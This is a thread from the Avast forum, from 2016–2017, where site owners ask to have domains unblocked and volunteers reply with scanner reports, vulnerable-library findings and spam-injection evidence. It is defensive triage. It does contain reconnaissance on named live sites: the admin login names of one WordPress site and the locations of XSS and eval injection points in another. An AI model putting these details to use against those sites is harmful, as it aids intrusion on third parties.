Title: Re: How to remove my website from your blacklist?
Post by: polonus on December 24, 2016, 06:29:03 PM
Aditionally to what Eddy says, there is more insecurity:

F-F-A-A-D-X-status: https://observatory.mozilla.org/analyze.html?host=neoplayerpodcast.blogspot.com.br

Potential problems and code flagged starting at line 742 *: https://aw-snap.info/file-viewer/?tgt=http%3A%2F%2Fneoplayerpodcast.blogspot.com.br&ref_sel=GSP2&ua_sel=ff&fs=1

F-status with serious "same-origin-rule" issues: https://sritest.io/#report/60cd57c3-1ce2-4e9e-86a0-60df52516462

Vuln. jQuery library: -http://neoplayerpodcast.blogspot.com.br
Detected libraries:
jquery - 1.10.2 : (active1) http://code.jquery.com/jquery-1.10.2.min.js
Info: Severity: medium
https://github.com/jquery/jquery/issues/2432
http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/
(active) - the library was also found to be active by running code
1 vulnerable library detected

Moreover and probably the site has been flagged is it is a PHISH: http://urlquery.net/report.php?id=1482600039161
PHISHing via so-called Bitsler-script *....

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: Heitor Chrisostomo on December 24, 2016, 07:29:56 PM
Is there any way to remove my website, startfinanceiro.com, from blacklist? Is there anyone inside the AVast forum who can do this? I really just wanted to solve the problem ...
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on December 24, 2016, 07:39:13 PM
contact avast  >  https://support.avast.com/support/tickets/new

Title: Re: How to remove my website from your blacklist?
Post by: Eddy on December 24, 2016, 07:54:01 PM
Wrong link.

https://www.avast.com/report-a-url.php
Title: Re: How to remove my website from your blacklist?
Post by: Heitor Chrisostomo on December 25, 2016, 12:50:47 AM
I've already contacted three or four times this week. Maybe they're on vacation. Anyway ... I'll wait. Merry Christmas!
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on December 26, 2016, 11:40:07 AM
elektrosavu[.]com was unblocked 23rd December ;)

I can visit startfinanceiro[.]com without any problem, the IP has been unblocked yesterday. Do note that it might be blocked again automatically if new malicious content appears on it.

neoplayerpodcast.blogspot[.]com.br was unblocked 6th December ;)
Title: Re: How to remove my website from your blacklist?
Post by: adrian.gheorghe02 on January 03, 2017, 02:30:40 PM
Hello,

My client's domain atelier13.ro was hacked in december. We have clened up the ftp and uploaded a new site which is clean. Can you please remove the domain from your blacklist?

Thank you
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on January 03, 2017, 02:42:19 PM
Hello,

My client's domain atelier13.ro was hacked in december. We have clened up the ftp and uploaded a new site which is clean. Can you please remove the domain from your blacklist?

Thank you
https://www.avast.com/report-a-url.php
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on January 03, 2017, 03:36:25 PM
atelier13[.]ro should be unblocked already ;)
Title: Re: How to remove my website from your blacklist?
Post by: polonus on January 03, 2017, 05:50:34 PM
 :o

Probably comes unblocked, because website is now offline, but it is on a known Locky Distribution IP: https://ransomwaretracker.abuse.ch/ip/176.223.208.37/host/atelier13.ro/
https://hosts-file.net/default.asp?s=+atelier13.ro  hpHosts and nGran listed website.

polonus

Title: Re: How to remove my website from your blacklist?
Post by: c.camargo on January 10, 2017, 05:47:47 PM
Hi,

Avast has blocked our site http://www.javeriana.edu.co but we are a education institution. We ask your help for unblock our site and let us know why is the exact reason for block.
Thanks a lot.

Carlos
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on January 10, 2017, 05:58:23 PM
Browser difference + link(s?) to blacklisted site :
https://www.websicherheit.at/website-malware-viren-scanner/?url=www.javeriana.edu.co

Suspicious (listed by Dr Web as adult site):
https://www.virustotal.com/en/url/1ce7893211cfebf3807b09c401a7776c7971ccdf705fbaec08321a2678266444/analysis/1484067035/

Blacklistings on that IP :
https://www.virustotal.com/en/ip-address/200.3.149.136/information/

Blacklistings on that AS :
http://urlquery.net/report.php?id=1484066290397

Vulnerable libraries used :
http://retire.insecurity.today/#!/scan/10e3ef4bda02cdab036990f4cee4d8556803684c9f8f2a80643378942a166ce6
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on January 11, 2017, 09:16:27 AM
It was blocked based on this submission: https://www.phishtank.com/phish_detail.php?phish_id=4612030
I added javeriana[.]edu.co to our cleanset, so it will not happen again ;)
Title: Re: How to remove my website from your blacklist?
Post by: c.camargo on January 11, 2017, 03:11:28 PM
Hi,

Thanks a lot for your help. We are contacting to Blacklist sites to remove our page from these reports. some as Trustwave indicate that is a mistake. We will contact www.phishtank.com and CleanMX.

Best regards,
Carlos Camargo
Title: Re: How to remove my website from your blacklist?
Post by: chris647 on February 17, 2017, 10:13:40 AM
Hi,

We are an Email Service Provider and one of our customers who send B2B mails only get their mail marked as spam.

The hostname is relay20.mysmtp1.com

Could you remove that from your blocklist?

Thanks.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on February 17, 2017, 10:24:08 AM
The domain is not blocked.
Could you post an example of the message? I will forward it to our antispam team.
Title: Re: How to remove my website from your blacklist?
Post by: chris647 on February 17, 2017, 11:51:34 AM
Hi,

I have sent a private message to you with the email getting marked as spam.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on February 17, 2017, 12:19:03 PM
Can confirm, I will forward it to the antispam guys to see what can be done.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on February 17, 2017, 01:50:34 PM
Hi chris647,

But there certainly are security issues here that should be mitigated:
Quote
It looks like custom errors are not correctly configured as the requested URL contains the heading "Server Error in".

Custom errors are easy to enable, just configure the web.config to ensure the mode is either "On" or "RemoteOnly" and ensure there is a valid "defaultRedirect" defined for a custom error page as follows:

<customErrors mode="RemoteOnly" defaultRedirect="~/Error" />
Silence your headers
Quote
By default, excessive information about the server and frameworks used by an ASP.NET application are returned in the response headers. These headers can be used to help identify security flaws which may exist as a result of the choice of technology exposed in these headers.

Result
The address you entered is unnecessarily exposing the following response headers which divulge its choice of web platform:

Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Clickjacking warning:
Quote
Overview
Websites are at risk of a clickjacking attack when they allow content to be embedded within a frame. An attacker may use this risk to invisibly load the target website into their own site and trick users into clicking on links which they never intended to. An "X-Frame-Options" header should be sent by the server to either deny framing of content, only allow it from the same origin or allow it from a trusted URIs.

Result
It doesn't look like an X-Frame-Options header was returned from the server which means that this website could be at risk of a clickjacking attack. Add a header to explicitly describe the acceptable framing practices (if any) for this site.
Quotes taken from Asafaweb scan report...

The Go-Daddy service at -ip-50-63-202-32.ip.secureserver.net has a questionable web rep.

And the IP the address you gave is on has been associated with Ransomeware (Locky): https://ransomwaretracker.abuse.ch/ip/50.63.202.32/

That may be the cause of some blocking it. You should take these issues up with GoDaddy, but they seem only responsible for transporting services and they are not liable for abuse at their services. This is a pity actually, because if they could be held responsible for what abuse they allow (just like various cloud services), we'd likely would have a far more secure infrastructure. Now they service "the good, the bad, and the ugly" and that as long as their bills are met.  8)

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: chris647 on February 17, 2017, 02:27:21 PM
Hi,

Where are you getting those errors from?

There isn't any ASP.NET running on that server (relay20.mysmtp1.com). It is a postfix server on Linux.

Is it coming from one of the domains listed in the email?

Which IP do you mean? I don't see references to any GoDaddy IPs in the email?

Thanks.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on February 17, 2017, 03:18:30 PM
Could well be, as what I report is for the main domain and that sub-domain of yours isn't public:
Your server has refused the connection from the File Viewer Tool! (Note: As a part of their security measures some shared hosting services will block this type of tool from scanning the sites they host.) -- so
I cannot even build a DNS report for -mysmtp1.com, still hosted by GoDaddy anyways,

Why I see three locations for your server here : http://www.rexswain.com/cgi-bin/httpview.cgi
and why it has been parked: <!DOCTYPE·html><body·style="padding:0;·margin:0;"><html><body><iframe·src="-http://mcc.godaddy.com/park/rzkzrzqwZF5jLab=/fe/nzcdYzIln2MdoaMuYaOvrt=="·style="visibility:·visible;height:·100%;·position:absolute"·allowtransparency="true"·marginheight="0"·marginwidth="0"·frameborder="0"·width="100%"></iframe></body></html>

uMatrix has prevented the following page from loading
htxp://mcc.godaddy.com/park/rzkzrzqwZF5jLab=/fe/nzcdYzIln2MdoaMuYaOvrt

Do not see any of this on the original registrar's smptp.dk site in Denmark?

polonus
Title: Re: How to remove my website from your blacklist?
Post by: udog on February 22, 2017, 12:15:06 AM
Our Temple website BreadAndTorah.org is blacklisted, however, BitDefender shows nothing bad I think: http://trafficlight.bitdefender.com/info?url=http://breadandtorah.org
Could you please remove it?
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on February 22, 2017, 12:19:30 AM
What is telling you that avast has blacklisted it ?
What other scans/checks dit you perform to check for (possible) issues ?
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on February 22, 2017, 12:34:04 AM
Seems like it is time to have a real good talk with your admin or perhaps even better... fire him and hire one that does know how to run a website.

Infected with SEO spam :
https://sitecheck.sucuri.net/results/breadandtorah.org

Linsk to (possibly) blacklisted sites :
https://www.websicherheit.at/website-malware-viren-scanner/?url=breadandtorah.org

Blacklisted :
https://www.virustotal.com/en/ip-address/96.126.109.103/information/

Vulnerable libraries used :
http://retire.insecurity.today/#!/scan/ea05da86571f18c2514131639e0660255409bd53e9e7421961a8cf9de9f1f59a

Using a 4(!) year old Wordpress version.... >:(
Title: Re: How to remove my website from your blacklist?
Post by: polonus on February 22, 2017, 01:17:55 AM
Eddy is right here. The site has been injected with pharma spam due to  security issues.

Please check this list for unknown links on your website:
The scan found some terms that are commonly used in spam hacks.
Hidden overflow from line 165- 170 in the source code.
Quote
imandare l’orgasmo quando si sente parlare di sesso tantrico si pensa subito alla durata
Pharma-spam!

-http://www.saratogasinai.org  -->  'temple sinai,' outside spam...
-http://www.mensa-france.org/files/mensans/cache/comprar-prop  -->  'comprar propecia en farmacia'
-http://www.mensa-france.org/files/mensans/cache/comprar-prop  -->  'comprar propecia en farmacia'
-http://www.institutpourlajustice.org/lp/presentation_ipj/cac  -->  'dove acquistare propecia'
-http://www.institutpourlajustice.org/lp/presentation_ipj/cac  -->  'dove acquistare propecia'
-http://e4n.fr/license.php?page=costo-propecia-in-farmacia-it  -->  'costo propecia in farmacia'
-http://e4n.fr/license.php?page=costo-propecia-in-farmacia-it  -->  'costo propecia in farmacia'
-http://aipcnet.it/meeting_2007/lib/costo-propecia-in-farmaci  -->  'costo propecia in farmacia'
-http://aipcnet.it/meeting_2007/lib/costo-propecia-in-farmaci  -->  'costo propecia in farmacia'
-http://usplucca.it/risorse/2009/fopags/lib/propecia-farmacia  -->  'propecia farmacia online'
-http://usplucca.it/risorse/2009/fopags/lib/propecia-farmacia  -->  'propecia farmacia online'
-http://www.saratogaarms.com  -->  'saratoga arms'
-http://www.theinnatsaratoga.com/  -->  ' the inn at saratoga'
-http://www.fiftysouth.com/  -->  '50 south'

Also consider the F-F-X-status here: https://observatory.mozilla.org/analyze.html?host=breadandtorah.org

Go here to cleanse the website of that filth found: https://aw-snap.info/articles/spam-hack-wordpress.php

polonus (volunteer website security analysis and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: cropfast on February 23, 2017, 06:57:32 AM
Great list of blacklisting sites here, really helpful. Any suggestions for how to stop spam links and ransomware from being injected? Don't think i can be on the watch on all these sites all the time  :-\
Title: Re: How to remove my website from your blacklist?
Post by: polonus on February 23, 2017, 02:13:35 PM
Hi cropfast,

Best thing is to configure your server against this. Input output validation, proper configuration with security headers and sri hashes generated, abiding by the so-called "same origin" policy. Know that with known flaws PHP (for instance loader.php, cache.php) is the royal way in of SEO Spam injection. Have proper input output validation always.

Do not rely on the so-called SEO Spam solutions that particular firms may offer, their Black Hat methods often land you in a worse position than before you invited them to "help".

I find firehol blocking a very good solution, implement this when your systems allow for it to be installed.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: biaggi on March 03, 2017, 12:48:15 PM
Hi, avast is blocking entry to our sites, how to solve this?
tvoje-zahrada[.]cz
tvojezahrada[.]cz
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 03, 2017, 12:56:59 PM
tvoje-zahrada[.]cz was blocked due to spreading Locky malware in November 2016. I am removing it from blacklist now ;)
Title: Re: How to remove my website from your blacklist?
Post by: biaggi on March 03, 2017, 01:04:55 PM
yes we had some phising attacks but whole server was cleaned and site engine upgraded to latest version in november. Could u please check our other sites that are on this server are they blocked:
rizar[.]cz
rizar-vaky[.]sk
kidsplanet[.]cz
fatso[.]cz
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 03, 2017, 01:10:31 PM
rizar[.]cz
rizar-vaky[.]sk
kidsplanet[.]cz
fatso[.]cz
None of these are blocked 8)
Title: Re: How to remove my website from your blacklist?
Post by: François37 on March 08, 2017, 04:27:20 PM
Hi Honzaz,

My e-commerce website is blacklisted by Avast since two days I cannot access it if I don't desactivate the agents.

I have performed many scan included virus total and nothing has been found.

Could you remove it from black list now please?

hxtps://andriphone.com/
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on March 08, 2017, 04:38:16 PM
Hi Honzaz,

My e-commerce website is blacklisted by Avast since two days I cannot access it if I don't desactivate the agents.

I have performed many scan included virus total and nothing has been found.

Could you remove it from black list now please?

Please don't post live links to sites that are detected.
Post the virus total link.
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on March 08, 2017, 04:47:20 PM
Hi Honzaz,

My e-commerce website is blacklisted by Avast since two days I cannot access it if I don't desactivate the agents.

I have performed many scan included virus total and nothing has been found.

Could you remove it from black list now please?

hxtps://andriphone.com/
Enormus amount of domains on same IP and many are blacklisted

IP history  >>  https://virustotal.com/en/ip-address/128.65.195.66/information/
click more button under list(s) for more info, you may need to click several times



Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 08, 2017, 05:12:41 PM
This was unfortunately a false positive; I am removing the domain from our blacklist now ;)
Title: Re: How to remove my website from your blacklist?
Post by: polonus on March 08, 2017, 05:41:31 PM
@bob3160,

With all the IP's they use, you'd have a hard  look to detect what VT scan to start first: at  least HonzaZ broke that URL.  :)
To see what I am on about go here and give the IP addresses in at urlquery dot net scan for instance.

What you asked for was not very possible to come up with, due to the circumstances and configuratrions.
Re: https://www.virustotal.com/nl/domain/andriphone.com/information/

Not everybody of those that come here for assistance  is aware of the necessity to break links that apear here.

The IP -31.170.167.206 for instance hosts a lot of so-called fake domains, and it is a pity that CloudFlare turns a blind eye as CDN to what it all transports, and that is why they often also hosts a gigantic amount of  connections for abusers all sorts.
It is not making our tasks easier.  ;)

Damian
Title: Re: How to remove my website from your blacklist?
Post by: François37 on March 08, 2017, 06:21:03 PM
"Not everybody of those that come here for assistance  is aware of the necessity to break links that apear here. "

So how can I achieved this?  8)

Thanks or the removal!
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on March 08, 2017, 06:24:05 PM
"Not everybody of those that come here for assistance  is aware of the necessity to break links that apear here. "

So how can I achieved this? 8)

Thanks or the removal!
@HonzaZ have done it for you 


Title: Re: How to remove my website from your blacklist?
Post by: François37 on March 08, 2017, 06:59:28 PM
Thanks for your professionalism!
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 09, 2017, 09:49:22 AM
Thanks for your professionalism!
8)

Funny story - up until recently, us moderators couldn't modify others' posts. We could split the topic, remove the message, issue a warning to the user (only did this once), or outright ban the user (fortunately never had to), but modifying messages was not allowed :D
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on March 09, 2017, 10:30:48 AM
You're moving up the ranks ;D
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on March 09, 2017, 07:44:36 PM
Thanks for your professionalism!
8)

Funny story - up until recently, us moderators couldn't modify others' posts. We could split the topic, remove the message, issue a warning to the user (only did this once), or outright ban the user (fortunately never had to), but modifying messages was not allowed :D
It was one of the items discussed in Prague. This must be the affirmative action Avast decided to take to make more people available to make those kinds of changes. :)
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 09, 2017, 07:57:56 PM
I do not think it has to do with ranks or responsibility - as I said, I could remove posts or ban users before - I think it was merely a misconfiguration :)
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on March 09, 2017, 08:24:04 PM
I do not think it has to do with ranks or responsibility - as I said, I could remove posts or ban users before - I think it was merely a misconfiguration :)
I hope not. :)
Title: Re: How to remove my website from your blacklist?
Post by: Niel3 on March 09, 2017, 10:06:41 PM
Hi there guys. Please help me. My website memoryblocks.co.za all of a sudden tonight got blacklisted. I am sure my site is clean. Please assist in whitelisting me again. Sorry to trouble.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on March 09, 2017, 10:09:44 PM
What do you mean with again ?
It is you first post here ;)

Did you ran the (online) scans to see what could be the reason ?

Here is already a very good reason for the blacklisting :
https://www.virustotal.com/en/ip-address/129.232.209.19/information/

And here is another one :
http://zulu.zscaler.com/submission/show/0bc79277f7f9840efacc553bd1055cad-1489093962
Title: Re: How to remove my website from your blacklist?
Post by: Niel3 on March 09, 2017, 10:15:37 PM
Sorry about again...No never happened before.Wow...thank you for coming back to me so quickly.Please explain how I do online scan
Thank you for your trouble
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on March 09, 2017, 10:25:32 PM
Quote
Please explain how I do online scan
That part is easy.
Use one of the many sites that can websites/IP's.

Depending on your knowledge, the hard part can be understanding the results they give.

I have several online scanners for this (and other things) listed on one of my simple websites ( http://www.ache.nl )

If you look at posts from Polonus and me on this webboard, you will see which one we mostly use.

Just something you need to take care of:
http://retire.insecurity.today/#!/scan/2b3ff6de9173917e7aa49cadbf48a9166db665a10c79e7ed141f77760e8e46b8

As you are running a commercial website, I strongly advise to get dedicated hosting on a secure server.
Title: Re: How to remove my website from your blacklist?
Post by: Niel3 on March 09, 2017, 10:36:58 PM
Thank you for the help. Do you know of anyone who can do this for me? And how much will it be. Midnight in South Africa...will check in tomorrow. Thank you for the kindness in trying to assist
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on March 09, 2017, 10:39:41 PM
Doing what ?
Getting dedicated hosting ?
Any decent host can provide it.
Title: Re: How to remove my website from your blacklist?
Post by: Niel3 on March 09, 2017, 10:43:23 PM
No Eddy...getting me of the blacklist. I just did a scan with virustotal and it came out clean. I really dont understand this
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on March 09, 2017, 10:48:58 PM
Virustotal does not scan websites, it checks blacklists.

Unless avast has detected something I don't know, it is likely a IP ban.

Ask avast to check your website.
If found clean (as I suspect), they will allow your domain.
But please follow my advise on the dedicated hosting.
With that many blacklistings on that ASN, it can easily be that your domain gets blacklisted again very soon and not only by avast.

nou dit is slaaptyd vir jou ;)
(het 'n vriendin had wat in jou land gebore is)
Title: Re: How to remove my website from your blacklist?
Post by: Niel3 on March 09, 2017, 10:52:30 PM
That amazing     Afrikaans...lol Where are you from? Speaking Afrikaans. How do I report this to Avast? And are you saying that I am not on a dedicated host?
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on March 09, 2017, 10:55:14 PM
No, dedicated host means that you have your own IP.
Now you are sharing the IP with a lot of other sites and that is likely the cause of the problem.

Ek is uit neerland
Title: Re: How to remove my website from your blacklist?
Post by: Niel3 on March 09, 2017, 11:04:24 PM
Ahhh I understand...Nederland...baie mooi. Let me see if I manage to report to Avast. Thank you so much. Baie dankie
Title: Re: How to remove my website from your blacklist?
Post by: polonus on March 10, 2017, 12:10:00 AM
Ha die Niel3,

Ik kom ook uit Holland, net als Eddy en uit dat deel waar vandaan Jan van Riebeeck naar Suid-Afrika vertrok.

Hoor dat Braaivlees bij jullie elk jaar beter wor en nu nog die websites. Ek sal 't een bietjie uitlegge..in het Engels, because this is the English section of the forums, and not in Dutch or Afrikaans. So here we go.

Look here: update your Word Press version: WordPress Version
4.7.3
Version does not appear to be latest 4.7.2 - update now.
Your WordPress Version is OK, seems there is a bug in the hackertarget scanner.

Are these plug-ins not left by their developers? elementor-pro & gp-premium?

Retirable code: Detected libraries:
jquery-migrate - 1.4.1 : -http://memoryblocks.co.za/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
jquery - 1.12.4 : (active1) -http://memoryblocks.co.za/wp-includes/js/jquery/jquery.js?ver=1.12.4
Info: Severity: medium
https://github.com/jquery/jquery/issues/2432
http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/
(active) - the library was also found to be active by running code
1 vulnerable library detected

Two stylesheets to have a look at: https://sritest.io/#report/3f5adeca-27a8-4d8a-8946-ca3e1ca67ea9

See recommendations here: https://observatory.mozilla.org/analyze.html?host=memoryblocks.co.za

Die uwe,

polonus aka Damiaan
Title: Re: How to remove my website from your blacklist?
Post by: Niel3 on March 10, 2017, 09:17:47 AM
 ;D ;D ;D Heheheh Jy moet kom kuier hier in Afrika
Thank you....I will try that. You guys are very kind.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 10, 2017, 09:19:04 AM
memoryblocks.co.za was indeed blocked because the whole IP (129.232.209.19) was blocked. I suggest getting a dedicated host, but in the meantime I am unblocking the IP ;)
Title: Re: How to remove my website from your blacklist?
Post by: untukmakluman on March 22, 2017, 08:08:44 AM
Hi

Please unblock my site its called areload.com

Before this my site dns was hosted on afraid.org and now I've moved to another dns server. Ive scan my site using the given links on first page, all came out clean.

I've also requested for google to review my site and google has emailed me that my site, is clean as well

Thank you.
Title: Re: How to remove my website from your blacklist?
Post by: LukasJ on March 22, 2017, 08:58:34 AM
Hi, areload.com has been removed from blacklist
Title: Re: How to remove my website from your blacklist?
Post by: untukmakluman on March 23, 2017, 05:00:36 AM
Thank you LukasJ
Title: Re: How to remove my website from your blacklist?
Post by: mash13 on March 23, 2017, 03:11:33 PM
Our site is also the victim of a false positive. Could you please remove it?

mybroadband.co.za
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 23, 2017, 03:26:18 PM
mybroadband.co.za has been removed from our blacklist ;)
Title: Re: How to remove my website from your blacklist?
Post by: mash13 on March 23, 2017, 04:07:28 PM
Thank you very much. Is there a way we can prevent this from happening in the future?

I've noticed only our homepage (https://mybroadband.co.za/news), but no other pages, are still receiving alerts. Could there be a reason for that?
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 24, 2017, 09:22:15 AM
Is there a way we can prevent this from happening in the future?
Blocking and unblocking URLs is such a complex process that it is almost impossible to "whitelist" whole domains. However, I can say that if a URL is unblocked, there is a much lower chance of it being blocked automatically again.

I've noticed only our homepage (https://mybroadband.co.za/news), but no other pages, are still receiving alerts. Could there be a reason for that?
None of your pages should be receiving alerts since I unblocked it yesteday.
Title: Re: How to remove my website from your blacklist?
Post by: estelle.courdoisy on March 24, 2017, 10:56:41 AM
Hello,

The domain from my cleint has the same problem, ziad.info can you please remove it from blacklist, it's a new website now.

Thanks
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 24, 2017, 11:00:35 AM
ziad.info removed from blacklist ;)
Title: Re: How to remove my website from your blacklist?
Post by: estelle.courdoisy on March 24, 2017, 11:22:06 AM
Thanks !
Title: Re: How to remove my website from your blacklist?
Post by: Area on April 27, 2017, 02:35:58 PM
Hi,

Our site is also the victim of a false positive. Could you please remove it?

envialosimple.com

*.envialosimple.com

Regards,

Emanuel.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on April 27, 2017, 02:45:04 PM
It is not a false positive.

I need a larger screen to see all the blacklistings on that IP
https://www.virustotal.com/en/ip-address/200.58.122.63/information/
http://urlquery.net/report.php?id=1493294697097

Vulnerable libraries used :
http://retire.insecurity.today/#!/scan/16af19c00905df360dc26ebd4c6a5e86fd950739f0cd8002215b159a0037733b

Area,
fix the vulnerable libraries and get dedicated hosting.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on April 27, 2017, 03:01:51 PM
As Eddy has stated, there is certainly some code to be mitigated:

htxp://envialosimple.com/en/index.html
Detected libraries:
jPlayer - 2.6.0 : (active1) -http://envialosimple.com/js/jquery.jplayer.min.js
jquery - 1.10.2 : (active1) -http://envialosimple.com/js/libraries.js
Info: Severity: medium
https://github.com/jquery/jquery/issues/2432
http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/
jquery.prettyPhoto - 3.1.5 : (active1) -http://envialosimple.com/js/libraries.js
Info: Severity: high
https://github.com/scaron/prettyphoto/issues/149
https://blog.anantshri.info/forgotten_disclosure_dom_xss_prettyphoto
jquery-ui-dialog - 1.10.3 : (active1) -http://envialosimple.com/en/index.html
jquery-ui-autocomplete - 1.10.3 : (active1) -http://envialosimple.com/en/index.html
jquery-ui-tooltip - 1.10.3 : (active1) -http://envialosimple.com/en/index.html
(active) - the library was also found to be active by running code
2 vulnerable libraries detected

DOM XSS sources and sinks galore: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fenvialosimple.com%2Fen%2Findex.html

Issue with googleadservice script SRI-hash generation lacking: https://sritest.io/#report/948ddcb3-5470-48c9-bcf7-47abc4d0d1d4

F-status and recommended change: https://observatory.mozilla.org/analyze.html?host=envialosimple.com

More insecurity on that Rosario racks: https://www.threatcrowd.org/ip.php?ip=200.58.122.63

For a final verdict or an exclusion to the general IP block, wait for a reaction from an Avast Team Member,
as we are just volunteers with relavant knowledge, but we cannot unblock.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on April 27, 2017, 03:18:05 PM
I do not see any detection on envialosimple[.]com, can you post a printscreen?
Title: Re: How to remove my website from your blacklist?
Post by: polonus on April 27, 2017, 04:07:44 PM
Here I see vulnerability for data bind injection exploit in knockout-3.0.0.js code.
This for envialosimple.dattatec dot com, it resides in /js/79/knockout-3.0.0.js
See: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fenvialosimple.dattatec.com
-> Results from scanning URL: htxp://envialosimple.dattatec.com/js/79/knockout.validation.js
Number of sources found: 17
Number of sinks found: 14
Also  htxp://envialosimple.dattatec.com/js/79/jquery.numberformatter.js seems open to a javascript  injection attack.
See the instances of return eval( etc.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on April 29, 2017, 01:03:34 PM
VirusTotal doesn't scan sites.
Next to that, VirusTotal does show a blacklisting for that site and a huge amount for that IP.
https://www.virustotal.com/en/url/1ae53e24426a38c1ebdce690d942e3ec6d470d3077fd99af6c097e5c1ea49258/analysis/1493463206/
https://www.virustotal.com/en/ip-address/104.31.16.3/information/

There is also the 301 (moved permantly) problem.

Likely links to blacklisted domains, browser difference :
https://www.websicherheit.at/website-malware-viren-scanner/?url=rnbxclusive.me

Blacklisted :
http://www.urlvoid.com/scan/rnbxclusive.me/

Infected :
https://sitecheck.sucuri.net/results/rnbxclusive.me

Malicious :
https://quttera.com/detailed_report/rnbxclusive.me

Blacklistings :
http://urlquery.net/report.php?id=1493461091139

Warning User Enumeration is possible
The first two user ID's were tested to determine if user enumeration is possible.
ID   User                    Login
1   rnbx_admin           rnbx_admin
2   Rnbxclusive_admin   rnbxclusive_admin

Vulnerable libraries used :
http://retire.insecurity.today/#!/scan/c1eddaacee4bedef45475b9be01ac777da5c49de704dd2854bc3dd234f97e66a

Other problems :
http://www.domxssscanner.com/scan?url=http://rnbxclusive.me
Title: Re: How to remove my website from your blacklist?
Post by: gediminas5 on May 12, 2017, 01:12:34 PM
Hello i need your help with arp[.]lt this site is blacklisted by avast antivirus. Is there any way to fix this problem? It doesn't contain any virus or malicious programs.
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on May 12, 2017, 01:17:23 PM
Hello i need your help with hxxp://www.arp.lt/ this site is blacklisted by avast antivirus. Is there any way to fix this problem? It doesn't contain any virus or malicious programs.
-> https://sitecheck.sucuri.net/results/www.arp.lt/
-> http://zulu.zscaler.com/submission/show/11afe3c22833d95b7530c79fe8d66f0d-1494587644

You can report a URL here: https://www.avast.com/report-a-url.php
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on May 12, 2017, 01:29:11 PM
Links to suspended domain :
https://www.websicherheit.at/website-malware-viren-scanner/?url=arp.lt

Blacklisted by Norton :
https://sitecheck.sucuri.net/results/arp.lt

Blacklistings :
https://www.virustotal.com/en/url/8bc39ba7bf1800a643227bdfed0a9f98259efe8a64ea36cdd245686ff5e6835a/analysis/1494588124/
https://www.virustotal.com/en/ip-address/79.98.25.107/information/
http://urlquery.net/report.php?id=1494586012134

Vulnerable libraries used :
http://retire.insecurity.today/#!/scan/7eeedd6ab4b030e539af879bee89b9f185f7de957a6f9c1e0c23c448b2cb1b5f
Title: Re: How to remove my website from your blacklist?
Post by: LukasJ on May 13, 2017, 07:26:38 PM
Hi, arp site was removed from blacklist yesterday.

Lukáš
Title: Re: How to remove my website from your blacklist?
Post by: ss77892 on May 16, 2017, 04:57:39 PM
Hi,
Could you please check why fun4dog.ru is blacklisted? https://sitecheck.sucuri.net/results/fun4dog.ru shows no problem.
Thanks!
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on May 16, 2017, 05:07:07 PM
Hi,
Could you please check why fun4dog.ru is blacklisted? https://sitecheck.sucuri.net/results/fun4dog.ru shows no problem.
Thanks!
Blacklisted
https://virustotal.com/nb/url/84711d1640005d5fe3908093c0003926e6f3520c9d5ec65f570a1e574e8618fb/analysis/1494947160/

and also hosted at afraid.org > see info from @Milos here
https://forum.avast.com/index.php?topic=164970.msg1175650#msg1175650




Title: Re: How to remove my website from your blacklist?
Post by: polonus on May 16, 2017, 05:41:57 PM
Site is 60/100% suspicious: http://zulu.zscaler.com/seen/cf860dc6eecb3fb0b51caf45fc23d053-1494947171
See F-status here: https://observatory.mozilla.org/analyze.html?host=fun4dog.ru
Retirable code: http://retire.insecurity.today/#!/scan/68507bce3c5b955b190c54908d92787eb94f26d3e387b7631d5fa51c7dacd536
See: http://www.domxssscanner.com/scan?url=http%3A%2F%2Ffun4dog.ru
Same origin policy seems well been maintained.
